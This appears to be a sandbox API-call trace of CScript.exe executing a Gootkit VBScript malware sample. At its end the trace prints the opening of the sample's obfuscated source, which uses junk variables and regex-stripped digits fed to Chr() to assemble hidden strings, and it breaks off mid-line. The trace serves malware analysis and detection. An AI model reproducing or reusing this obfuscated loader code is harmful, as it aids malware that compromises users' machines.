	[0029.628] GetLocaleInfoW (in: Locale=0x409, LCType=0x20000070, lpLCData=0x17eed7f4f0, cchData=2 | out: lpLCData="") returned 2
	[0029.629] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x7ffc145f0000
	[0029.629] GetProcAddress (hModule=0x7ffc145f0000, lpProcName="SetThreadUILanguage") returned 0x7ffc14613270
	[0029.629] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0029.629] FreeLibrary (hLibModule=0x7ffc145f0000) returned 1
	[0029.629] GetCommandLineW () returned="\"C:\\Windows\\System32\\CScript.exe\"  \"C:\\Users\\Nd9E1FYi\\Desktop\\gootkit_vbs-6ded37a6.vir.vbs\" "
	[0029.629] wcscpy_s (in: _Destination=0x17eed7f9b0, _SizeInWords=0x5d, _Source="\"C:\\Windows\\System32\\CScript.exe\"  \"C:\\Users\\Nd9E1FYi\\Desktop\\gootkit_vbs-6ded37a6.vir.vbs\" " | out: _Destination="\"C:\\Windows\\System32\\CScript.exe\"  \"C:\\Users\\Nd9E1FYi\\Desktop\\gootkit_vbs-6ded37a6.vir.vbs\" ") returned 0x0
	[0029.629] wcscpy_s (in: _Destination=0x17eed7f9b0, _SizeInWords=0x5d, _Source="C:\\Windows\\System32\\CScript.exe\"  \"C:\\Users\\Nd9E1FYi\\Desktop\\gootkit_vbs-6ded37a6.vir.vbs\" " | out: _Destination="C:\\Windows\\System32\\CScript.exe\"  \"C:\\Users\\Nd9E1FYi\\Desktop\\gootkit_vbs-6ded37a6.vir.vbs\" ") returned 0x0
	[0029.629] wcscpy_s (in: _Destination=0x17eed7f9ee, _SizeInWords=0x3d, _Source="  \"C:\\Users\\Nd9E1FYi\\Desktop\\gootkit_vbs-6ded37a6.vir.vbs\" " | out: _Destination="  \"C:\\Users\\Nd9E1FYi\\Desktop\\gootkit_vbs-6ded37a6.vir.vbs\" ") returned 0x0
	[0029.629] wcscpy_s (in: _Destination=0x17eed7f9f2, _SizeInWords=0x3a, _Source="C:\\Users\\Nd9E1FYi\\Desktop\\gootkit_vbs-6ded37a6.vir.vbs\" " | out: _Destination="C:\\Users\\Nd9E1FYi\\Desktop\\gootkit_vbs-6ded37a6.vir.vbs\" ") returned 0x0
	[0029.629] wcscpy_s (in: _Destination=0x17eed7fa5e, _SizeInWords=0x3, _Source=" " | out: _Destination=" ") returned 0x0
	[0029.630] GetCurrentThreadId () returned 0xd50
	[0029.630] CoInitialize (pvReserved=0x0) returned 0x0
	[0030.117] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x17eed7f628 | out: phkResult=0x17eed7f628*=0xe8) returned 0x0
	[0030.117] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x17eed7f620 | out: phkResult=0x17eed7f620*=0xec) returned 0x0
	[0030.117] RegQueryValueExW (in: hKey=0xec, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x17eed7e914, lpData=0x17eed7ed20, lpcbData=0x17eed7e910*=0x400 | out: lpType=0x17eed7e914*=0x0, lpData=0x17eed7ed20*=0x0, lpcbData=0x17eed7e910*=0x400) returned 0x2
	[0030.118] RegQueryValueExW (in: hKey=0xe8, lpValueName="Enabled", lpReserved=0x0, lpType=0x17eed7e914, lpData=0x17eed7ed20, lpcbData=0x17eed7e910*=0x400 | out: lpType=0x17eed7e914*=0x0, lpData=0x17eed7ed20*=0x0, lpcbData=0x17eed7e910*=0x400) returned 0x2
	[0030.118] RegQueryValueExW (in: hKey=0xec, lpValueName="Enabled", lpReserved=0x0, lpType=0x17eed7e914, lpData=0x17eed7ed20, lpcbData=0x17eed7e910*=0x400 | out: lpType=0x17eed7e914*=0x0, lpData=0x17eed7ed20*=0x0, lpcbData=0x17eed7e910*=0x400) returned 0x2
	[0030.118] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0030.620] RegCloseKey (hKey=0xec) returned 0x0
	[0030.621] RegCloseKey (hKey=0xe8) returned 0x0
	[0030.621] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x17eed7f340 | out: phkResult=0x17eed7f340*=0xe8) returned 0x0
	[0030.621] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x17eed7f338 | out: phkResult=0x17eed7f338*=0xec) returned 0x0
	[0030.621] RegQueryValueExW (in: hKey=0xec, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x17eed7e634, lpData=0x17eed7ea40, lpcbData=0x17eed7e630*=0x400 | out: lpType=0x17eed7e634*=0x0, lpData=0x17eed7ea40*=0xc0, lpcbData=0x17eed7e630*=0x400) returned 0x2
	[0030.621] RegQueryValueExW (in: hKey=0xe8, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x17eed7e634, lpData=0x17eed7ea40, lpcbData=0x17eed7e630*=0x400 | out: lpType=0x17eed7e634*=0x0, lpData=0x17eed7ea40*=0xc0, lpcbData=0x17eed7e630*=0x400) returned 0x2
	[0030.621] RegQueryValueExW (in: hKey=0xec, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x17eed7e634, lpData=0x17eed7ea40, lpcbData=0x17eed7e630*=0x400 | out: lpType=0x17eed7e634*=0x0, lpData=0x17eed7ea40*=0xc0, lpcbData=0x17eed7e630*=0x400) returned 0x2
	[0030.621] RegCloseKey (hKey=0xec) returned 0x0
	[0030.621] RegCloseKey (hKey=0xe8) returned 0x0
	[0030.621] GetACP () returned 0x4e4
	[0030.621] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x800) returned 0x7ffc145f0000
	[0030.621] GetProcAddress (hModule=0x7ffc145f0000, lpProcName="HeapSetInformation") returned 0x7ffc14617430
	[0030.622] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0030.622] FreeLibrary (hLibModule=0x7ffc145f0000) returned 1
	[0030.622] CoRegisterMessageFilter (in: lpMessageFilter=0x128815a1740, lplpMessageFilter=0x128815a1750 | out: lplpMessageFilter=0x128815a1750*=0x0) returned 0x0
	[0030.622] IUnknown:AddRef (This=0x128815a1740) returned 0x2
	[0030.622] GetModuleFileNameW (in: hModule=0x7ff6c3d30000, lpFilename=0x17eed7f6a0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\CScript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")) returned 0x1f
	[0030.622] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\CScript.exe", lpdwHandle=0x17eed7efc0 | out: lpdwHandle=0x17eed7efc0) returned 0x6f4
	[0030.622] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\CScript.exe", dwHandle=0x0, dwLen=0x6f4, lpData=0x17eed7e8c0 | out: lpData=0x17eed7e8c0) returned 1
	[0030.622] VerQueryValueW (in: pBlock=0x17eed7e8c0, lpSubBlock="\\", lplpBuffer=0x17eed7efc8, puLen=0x17eed7efc4 | out: lplpBuffer=0x17eed7efc8*=0x17eed7e8e8, puLen=0x17eed7efc4) returned 1
	[0030.622] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x17eed7f018 | out: phkResult=0x17eed7f018*=0xe8) returned 0x0
	[0030.623] RegQueryValueExW (in: hKey=0xe8, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x17eed7e354, lpData=0x17eed7e760, lpcbData=0x17eed7e350*=0x400 | out: lpType=0x17eed7e354*=0x0, lpData=0x17eed7e760*=0x0, lpcbData=0x17eed7e350*=0x400) returned 0x2
	[0030.623] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x17eed7efd0 | out: phkResult=0x17eed7efd0*=0xec) returned 0x0
	[0030.623] RegQueryValueExW (in: hKey=0xec, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x17eed7ef84, lpData=0x17eed7f010, lpcbData=0x17eed7ef80*=0x4 | out: lpType=0x17eed7ef84*=0x0, lpData=0x17eed7f010*=0x1, lpcbData=0x17eed7ef80*=0x4) returned 0x2
	[0030.623] RegQueryValueExW (in: hKey=0xec, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x17eed7e354, lpData=0x17eed7e760, lpcbData=0x17eed7e350*=0x400 | out: lpType=0x17eed7e354*=0x0, lpData=0x17eed7e760*=0x0, lpcbData=0x17eed7e350*=0x400) returned 0x2
	[0030.623] RegQueryValueExW (in: hKey=0xe8, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x17eed7ef84, lpData=0x17eed7f010, lpcbData=0x17eed7ef80*=0x4 | out: lpType=0x17eed7ef84*=0x0, lpData=0x17eed7f010*=0x1, lpcbData=0x17eed7ef80*=0x4) returned 0x2
	[0030.623] RegQueryValueExW (in: hKey=0xe8, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x17eed7e354, lpData=0x17eed7e760, lpcbData=0x17eed7e350*=0x400 | out: lpType=0x17eed7e354*=0x1, lpData="1", lpcbData=0x17eed7e350*=0x4) returned 0x0
	[0030.623] RegCloseKey (hKey=0xec) returned 0x0
	[0030.623] RegCloseKey (hKey=0xe8) returned 0x0
	[0030.623] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x1700020019, lpSecurityAttributes=0x0, phkResult=0x17eed7f018, lpdwDisposition=0x0 | out: phkResult=0x17eed7f018*=0xe8, lpdwDisposition=0x0) returned 0x0
	[0030.623] RegQueryValueExW (in: hKey=0xe8, lpValueName="Timeout", lpReserved=0x0, lpType=0x17eed7efa4, lpData=0x17eed7f010, lpcbData=0x17eed7efa0*=0x4 | out: lpType=0x17eed7efa4*=0x0, lpData=0x17eed7f010*=0x1, lpcbData=0x17eed7efa0*=0x4) returned 0x2
	[0030.623] RegQueryValueExW (in: hKey=0xe8, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x17eed7e374, lpData=0x17eed7e780, lpcbData=0x17eed7e370*=0x400 | out: lpType=0x17eed7e374*=0x1, lpData="1", lpcbData=0x17eed7e370*=0x4) returned 0x0
	[0030.623] RegCloseKey (hKey=0xe8) returned 0x0
	[0030.623] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x7ffc00020019, lpSecurityAttributes=0x0, phkResult=0x17eed7f018, lpdwDisposition=0x0 | out: phkResult=0x17eed7f018*=0xe8, lpdwDisposition=0x0) returned 0x0
	[0030.623] RegQueryValueExW (in: hKey=0xe8, lpValueName="Timeout", lpReserved=0x0, lpType=0x17eed7efa4, lpData=0x17eed7f010, lpcbData=0x17eed7efa0*=0x4 | out: lpType=0x17eed7efa4*=0x0, lpData=0x17eed7f010*=0x1, lpcbData=0x17eed7efa0*=0x4) returned 0x2
	[0030.623] RegQueryValueExW (in: hKey=0xe8, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x17eed7e374, lpData=0x17eed7e780, lpcbData=0x17eed7e370*=0x400 | out: lpType=0x17eed7e374*=0x0, lpData=0x17eed7e780*=0x31, lpcbData=0x17eed7e370*=0x400) returned 0x2
	[0030.623] RegCloseKey (hKey=0xe8) returned 0x0
	[0030.623] wcscpy_s (in: _Destination=0x17eed7f29c, _SizeInWords=0x104, _Source="C:\\Users\\Nd9E1FYi\\Desktop\\gootkit_vbs-6ded37a6.vir.vbs" | out: _Destination="C:\\Users\\Nd9E1FYi\\Desktop\\gootkit_vbs-6ded37a6.vir.vbs") returned 0x0
	[0030.623] LoadStringW (in: hInstance=0x7ff6c3d30000, uID=0x834, lpBuffer=0x17eed7df10, cchBufferMax=2048 | out: lpBuffer="Microsoft (R) Windows Script Host Version %1!u!.%2!u!\nCopyright (C) Microsoft Corporation. All rights reserved.\n") returned 0x70
	[0030.624] FormatMessageW (in: dwFlags=0x500, lpSource=0x1288138a8e8, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x17eed7eef8, nSize=0x0, Arguments=0x17eed7ef68 | out: lpBuffer="\xb4c0\x8138\x128") returned 0x6c
	[0030.624] LocalFree (hMem=0x1288138b4c0) returned 0x0
	[0030.624] GetStdHandle (nStdHandle=0xfffffff5) returned 0x2c
	[0030.625] GetConsoleMode (in: hConsoleHandle=0x2c, lpMode=0x17eed7ecb0 | out: lpMode=0x17eed7ecb0) returned 1
	[0030.627] WriteConsoleW (in: hConsoleOutput=0x2c, lpBuffer=0x1288138ae90*, nNumberOfCharsToWrite=0x6e, lpNumberOfCharsWritten=0x17eed7ecb8, lpReserved=0x0 | out: lpBuffer=0x1288138ae90*, lpNumberOfCharsWritten=0x17eed7ecb8*=0x6e) returned 1
	[0030.639] LoadStringW (in: hInstance=0x7ff6c3d30000, uID=0x7d1, lpBuffer=0x17eed7da30, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13
	[0030.643] LoadTypeLib (in: szFile="C:\\Windows\\System32\\CScript.exe", pptlib=0x17eed7ea70*=0x0 | out: pptlib=0x17eed7ea70*=0x1288138b6d0) returned 0x0
	[0030.651] ITypeLib:GetTypeInfoOfGuid (in: This=0x1288138b6d0, GUID=0x7ff6c3d46f60*(Data1=0x91afbd1b, Data2=0x5feb, Data3=0x43f5, Data4=([0]=0xb0, [1]=0x28, [2]=0xe2, [3]=0xca, [4]=0x96, [5]=0x6, [6]=0x17, [7]=0xec)), ppTInfo=0x17eed7ea58 | out: ppTInfo=0x17eed7ea58*=0x1288138bf58) returned 0x0
	[0030.801] ITypeLib:GetTypeInfoOfGuid (in: This=0x1288138b6d0, GUID=0x7ff6c3d47598*(Data1=0x2cc5a9d0, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x17eed7ea28 | out: ppTInfo=0x17eed7ea28*=0x1288138c008) returned 0x0
	[0030.801] ITypeInfo:GetRefTypeOfImplType (in: This=0x1288138c008, index=0xffffffff, pRefType=0x17eed7ea20 | out: pRefType=0x17eed7ea20*=0xfffffffe) returned 0x0
	[0030.802] ITypeInfo:GetRefTypeInfo (in: This=0x1288138c008, hreftype=0xfffffffe, ppTInfo=0x7ff6c3d520c8 | out: ppTInfo=0x7ff6c3d520c8*=0x1288138c060) returned 0x0
	[0030.802] IUnknown:Release (This=0x1288138c008) returned 0x1
	[0030.802] ITypeLib:GetTypeInfoOfGuid (in: This=0x1288138b6d0, GUID=0x7ff6c3d47790*(Data1=0xbf64faf0, Data2=0x5906, Data3=0x426c, Data4=([0]=0xb4, [1]=0xbc, [2]=0x7b, [3]=0x75, [4]=0x3c, [5]=0xbe, [6]=0x81, [7]=0x9f)), ppTInfo=0x17eed7ea28 | out: ppTInfo=0x17eed7ea28*=0x1288138c0b8) returned 0x0
	[0030.802] ITypeInfo:GetRefTypeOfImplType (in: This=0x1288138c0b8, index=0xffffffff, pRefType=0x17eed7ea20 | out: pRefType=0x17eed7ea20*=0xfffffffe) returned 0x0
	[0030.802] ITypeInfo:GetRefTypeInfo (in: This=0x1288138c0b8, hreftype=0xfffffffe, ppTInfo=0x7ff6c3d52088 | out: ppTInfo=0x7ff6c3d52088*=0x1288138c110) returned 0x0
	[0030.802] IUnknown:Release (This=0x1288138c0b8) returned 0x1
	[0030.802] ITypeLib:GetTypeInfoOfGuid (in: This=0x1288138b6d0, GUID=0x7ff6c3d46f70*(Data1=0x2cc5a9d1, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x17eed7ea28 | out: ppTInfo=0x17eed7ea28*=0x1288138c168) returned 0x0
	[0030.802] ITypeInfo:GetRefTypeOfImplType (in: This=0x1288138c168, index=0xffffffff, pRefType=0x17eed7ea20 | out: pRefType=0x17eed7ea20*=0xfffffffe) returned 0x0
	[0030.802] ITypeInfo:GetRefTypeInfo (in: This=0x1288138c168, hreftype=0xfffffffe, ppTInfo=0x7ff6c3d52048 | out: ppTInfo=0x7ff6c3d52048*=0x1288138c1c0) returned 0x0
	[0030.802] IUnknown:Release (This=0x1288138c168) returned 0x1
	[0030.802] IUnknown:Release (This=0x1288138b6d0) returned 0x4
	[0030.802] GetCurrentThreadId () returned 0xd50
	[0030.802] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x11c
	[0030.802] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7ff6c3d37850, lpParameter=0x128815a1770, dwCreationFlags=0x0, lpThreadId=0x128815a1798 | out: lpThreadId=0x128815a1798*=0xf20) returned 0x120
	[0030.813] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x17eed7eca0*=0x11c, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff) returned 0x0
	[0030.813] CloseHandle (hObject=0x11c) returned 1
	[0030.814] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop\\gootkit_vbs-6ded37a6.vir.vbs", nBufferLength=0x104, lpBuffer=0x17eed7ed90, lpFilePart=0x17eed7ed88 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\gootkit_vbs-6ded37a6.vir.vbs", lpFilePart=0x17eed7ed88*="gootkit_vbs-6ded37a6.vir.vbs") returned 0x36
	[0030.814] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".vbs", ulOptions=0x0, samDesired=0x20019, phkResult=0x17eed7e290 | out: phkResult=0x17eed7e290*=0x13e) returned 0x0
	[0030.814] RegQueryValueExW (in: hKey=0x13e, lpValueName=0x0, lpReserved=0x0, lpType=0x17eed7e254, lpData=0x17eed7e2a0, lpcbData=0x17eed7e250*=0x800 | out: lpType=0x17eed7e254*=0x1, lpData="VBSFile", lpcbData=0x17eed7e250*=0x10) returned 0x0
	[0030.814] RegCloseKey (hKey=0x13e) returned 0x0
	[0030.814] wcscat_s (in: _Destination="VBSFile", _SizeInWords=0x40e, _Source="\\ScriptEngine" | out: _Destination="VBSFile\\ScriptEngine") returned 0x0
	[0030.814] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="VBSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x17eed7e290 | out: phkResult=0x17eed7e290*=0x13e) returned 0x0
	[0030.814] RegQueryValueExW (in: hKey=0x13e, lpValueName=0x0, lpReserved=0x0, lpType=0x17eed7e254, lpData=0x17eed7eb10, lpcbData=0x17eed7e250*=0x200 | out: lpType=0x17eed7e254*=0x1, lpData="VBScript", lpcbData=0x17eed7e250*=0x12) returned 0x0
	[0030.814] RegCloseKey (hKey=0x13e) returned 0x0
	[0030.815] CLSIDFromString (in: lpsz="VBScript", pclsid=0x17eed7ea88 | out: pclsid=0x17eed7ea88*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8))) returned 0x0
	[0030.815] CoCreateInstance (in: rclsid=0x17eed7ea88*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x7ff6c3d46f30*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x17eed7ea80 | out: ppv=0x17eed7ea80*=0x128815a6400) returned 0x0
	[0031.293] __dllonexit () returned 0x7ffbf8eb3c00
	[0031.293] __dllonexit () returned 0x7ffbf8eb3c10
	[0031.293] __dllonexit () returned 0x7ffbf8eb3c20
	[0031.294] GetUserDefaultLCID () returned 0x409
	[0031.294] GetVersion () returned 0x295a000a
	[0031.294] GetModuleHandleW (lpModuleName="api-ms-win-core-processthreads-l1-1-2.dll") returned 0x7ffc145f0000
	[0031.294] GetProcAddress (hModule=0x7ffc145f0000, lpProcName="QueryProtectedPolicy") returned 0x7ffc128b02d0
	[0031.294] VirtualProtect (in: lpAddress=0x7ffbf8efd668, dwSize=0x8, flNewProtect=0x4, lpflOldProtect=0x17eed7c590 | out: lpflOldProtect=0x17eed7c590*=0x2) returned 1
	[0031.294] VirtualProtect (in: lpAddress=0x7ffbf8efd668, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x17eed7c590 | out: lpflOldProtect=0x17eed7c590*=0x4) returned 1
	[0031.296] GetUserDefaultLCID () returned 0x409
	[0031.296] GetACP () returned 0x4e4
	[0031.296] LoadLibraryExW (lpLibFileName="amsi.dll", hFile=0x0, dwFlags=0x800) returned 0x7ffc0b3d0000
	[0031.402] GetProcAddress (hModule=0x7ffc0b3d0000, lpProcName="AmsiInitialize") returned 0x7ffc0b3d2260
	[0031.403] GetProcAddress (hModule=0x7ffc0b3d0000, lpProcName="AmsiScanString") returned 0x7ffc0b3d26b0
	[0031.403] AmsiInitialize () returned 0x80070103
	[0031.406] GetCurrentThreadId () returned 0xd50
	[0031.406] GetCurrentThreadId () returned 0xd50
	[0031.406] GetCurrentThreadId () returned 0xd50
	[0031.406] GetUserDefaultLCID () returned 0x409
	[0031.406] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
	[0031.406] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x17eed7e9d0, cchData=6 | out: lpLCData="1252") returned 5
	[0031.406] IsValidCodePage (CodePage=0x4e4) returned 1
	[0031.407] GetModuleHandleW (lpModuleName="api-ms-win-core-delayload-l1-1-1.dll") returned 0x7ffc12840000
	[0031.407] GetProcAddress (hModule=0x7ffc12840000, lpProcName="ResolveDelayLoadedAPI") returned 0x7ffc1289f670
	[0031.407] GetProcAddress (hModule=0x7ffc12840000, lpProcName="ResolveDelayLoadsFromDll") returned 0x7ffc12901540
	[0031.407] ResolveDelayLoadedAPI () returned 0x7ffc1495fb70
	[0031.408] CoCreateInstance (in: rclsid=0x7ffbf8efe800*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffbf8efe7e0*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x128815a6748 | out: ppv=0x128815a6748*=0x1288139c0c0) returned 0x0
	[0031.408] IUnknown:AddRef (This=0x1288139c0c0) returned 0x2
	[0031.408] GetCurrentProcessId () returned 0xd40
	[0031.408] GetCurrentThreadId () returned 0xd50
	[0031.408] GetTickCount () returned 0x1bce2
	[0031.408] ISystemDebugEventFire:BeginSession (This=0x1288139c0c0, guidSourceID=0x7ffbf8efe958, strSessionName="VBScript:00003392:00003408:18113890") returned 0x0
	[0031.408] GetCurrentThreadId () returned 0xd50
	[0031.408] GetCurrentThreadId () returned 0xd50
	[0031.409] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\Desktop\\gootkit_vbs-6ded37a6.vir.vbs" (normalized: "c:\\users\\nd9e1fyi\\desktop\\gootkit_vbs-6ded37a6.vir.vbs"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x164
	[0031.409] GetFileSize (in: hFile=0x164, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1cb27
	[0031.409] CreateFileMappingA (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1cb27, lpName=0x0) returned 0x168
	[0031.409] MapViewOfFile (hFileMappingObject=0x168, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x12881560000
	[0031.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x12881560000, cbMultiByte=117543, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 117543
	[0031.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x12881560000, cbMultiByte=117543, lpWideCharStr=0x128813a2de8, cchWideChar=117543 | out: lpWideCharStr="sbgudecc = -17979\r\nsfzzyjdhz = \"\"\r\nbzagxye = \"e0t0t7x2u\"\r\nisaeac = \"\"\r\nujwjiv = -80055\r\nzjhexcv = 0\r\nevtfga = 141\r\nzdgbwyx = \"e cy1y1e3\"\r\nSet uvjivfee = NEW RegExp\r\nbdhdga = \"ajscw hi\"\r\nbejugg = true\r\nvswdjegxt = \"6uag0 ax\"\r\ngvwuzbz = -56051\r\nuvjivfee.Pattern = \"[^0-9]\"\r\nstjhff = -94464\r\nfzbutew = \"\"\r\njjvxsdhst = -88409\r\nfxzzwgey = \"\"\r\nccssxv = -66192\r\nuvjivfee.Global = True\r\nfvuhje = \"wb7yvad3c\"\r\nyzwfwhfav = \"01bfdyb \"\r\nuubwyeueb = \"\"\r\naiwejax = -97152\r\nztczasg = \"ucv yt \"\r\netvtej = -59959\r\nwcxjdda = \"uzxihu87autihixy\"\r\nvsyihygdt = \"vvtycv\"\r\nyxbgavtw = uvjivfee.Replace(wcxjdda , sfzzyjdhz ) \r\nffhjhjs = -38700\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(yxbgavtw)\r\nbbhciu = \"sdtty0\"\r\nxzhsyhcxt = \"jeix0t1x\"\r\ngecivguu = \"d0saw0f2a\"\r\njshisfa = -29787\r\ncsyexsged = \"gvbhtj83eszwfyigh\"\r\nbyzashg = \"diafe7df\"\r\nbwgivt = uvjivfee.Replace(csyexsged , sfzzyjdhz ) \r\nsczxta = -54162\r\nxyxtzhwg = \"e98 9 6\"\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(bwgivt)\r\nfcwiii = 8113\r\nscyaes = \"x6ujvww\"\r\nsjvavejau = \"cfxyhxha99fhcyjxjvc\"\r\nxccfce = 5456\r\nuzbjuid = uvjivfee.Replace(sjvavejau , sfzzyjdhz ) \r\ntwvefhgec = \"vv5z9z\"\r\nwdufww = \"4 4t3fe\"\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(uzbjuid)\r\ngddsaxdsd = \"5z1bghh y\"\r\nzxvgug = 4105\r\neeijfxwv = \"89 a dg2e\"\r\niwadwajc = \"uhvhfsaix114echccdc\"\r\ndgxhaxd = -47193\r\nvehgaavjx = uvjivfee.Replace(iwadwajc , sfzzyjdhz ) \r\nfswdcjgvb = -70420\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(vehgaavjx)\r\nwyeixa = \"7viwgetx\"\r\nfjtwwgvau = \"f5ja9v9ia\"\r\nytwxthv = -35754\r\nzjdcaxi = -77819\r\nivwsvt = \"awgtubvj105ssgjscfiz\"\r\nwievsjs = \"jaxy06\"\r\nscbafxs = -41247\r\nvxcheved = uvjivfee.Replace(ivwsvt , sfzzyjdhz ) \r\ndzgctyecj = \"284jh0 wc\"\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(vxcheved)\r\nwahyui = -81116\r\nehaszxivz = -50167\r\njziaythb = \"iizybf112xcdexhsub\"\r\nbssxsxgj = -42090\r\nidxzas = -89913\r\nfyfthee = uvjivfee.Replace(jziaythb , sfzzyjdhz ) \r\nbvugjsu = -22034\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(fyfthee)\r\nivtyua = \"b0szf3vuy\"\r\nvgacgxvjx = \"5i c8730\"\r\nshswbeav = \"a1bzfi\"\r\nzcwxiewaj = \"hafsxs116zhshatcz\"\r\nzwxvbttsw = -88567\r\ndavidijg = \"u3wbyu\"\r\nwshthse = uvjivfee.Replace(zcwxiewaj , sfzzyjdhz ) \r\ngvwtdjj = \"hab 1cv\"\r\nvybbhuwy = \"h4cji86\"\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(wshthse)\r\nvigjiy = \"sibxf2w 1\"\r\ndayhdg = \"8x zbi5\"\r\ntzbujizjw = -75329\r\nezziddgz = \"gaysfa46wufecgbj\"\r\niiidgd = -50070\r\nzjfahzati = \"g3d0y6azw\"\r\nuxazfjyx = uvjivfee.Replace(ezziddgz , sfzzyjdhz ) \r\nfwdjyyw = \"aiyz y\"\r\ngfcaevd = 